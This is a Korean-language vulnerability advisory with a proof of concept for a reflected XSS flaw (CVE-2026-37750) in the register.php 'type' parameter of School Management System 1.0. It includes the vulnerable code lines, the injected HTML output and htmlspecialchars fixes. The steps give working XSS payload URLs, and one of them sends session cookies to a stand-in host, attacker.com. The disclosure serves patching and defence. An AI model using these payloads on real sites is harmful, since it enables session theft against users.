
# School Management System 1.0용 반사형 XSS 개념 증명 School Management System 1.0의 반사형 XSS 개념 증명으로, register.php의 type 매개변수를 통한 인증되지 않은 JavaScript 실행을 시연하며, 영향 분석 및 수정 지침을 포함합니다.
| 필드 | 정보 |
|---|
| CVE ID | CVE-2026-37750 |
| 유형 | 반사형 교차 사이트 스크립팅 (XSS) |
| 심각도 | 중간 (CVSSv3: 6.1) |
| 공급업체 | mahmoudai1 |
| 제품 | School Management System |
| 버전 | 1.0 |
| 발견자 | Varad AP Mene |
| 날짜 | 2026-04-16 |
| CWE | CWE-79 |
mahmoudai1이 개발한 School Management System 1.0의 반사형 교차 사이트 스크립팅(XSS) 취약점으로, 인증되지 않은 원격 공격자가 register.php의 살균되지 않은 type 매개변수를 통해 피해자 브라우저에서 임의의 JavaScript를 실행할 수 있습니다. 해당 매개변수는 22행의 h1 태그 내부와 26행의 form action 속성 내부에서 이스케이프 없이 반사됩니다. 이 취약점을 악용하는 데 인증이 필요하지 않습니다.
CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 중간 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
School Management System 1.0은 GitHub에서 mahmoudai1이 개발한 PHP/MySQL 웹 애플리케이션으로, 학교에서 학생, 교사 및 학부모를 관리하는 데 사용됩니다.
register.php — 등록 양식 (인증 불필요)
22행: echo ucfirst($_REQUEST['type'])
26행: echo $_REQUEST['type']
htmlspecialchars()가 사용되지 않음 — 원시 사용자 입력이 HTML에 직접 반사됩니다.
전제 조건:
1단계 — 브라우저를 열고 다음 URL을 방문합니다: http://target/register.php?type=script-alert-document.cookie-/script
2단계 — 브라우저에서 JavaScript가 실행됩니다 결과: 세션 쿠키를 표시하는 경고 상자가 나타납니다.
3단계 — 쿠키 탈취 페이로드: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script 4단계 — form action 주입 페이로드: http://target/register.php?type="-script-alert(1)-/script
두 개의 주입 지점이 확인되었습니다:
주입 지점 1 — h1 태그 내부 (22행):
echo ucfirst($_REQUEST['type'])
출력:
<h1><script>alert(1)</script> Application</h1>
주입 지점 2 — form action 속성 내부 (26행):
echo $_REQUEST['type']
출력:
<form action="register.php?type=<script>alert(1)</script>">
22행 수정: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');
26행 수정: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');
Varad AP Mene 이메일: [email protected] GitHub: https://github.com/menevarad007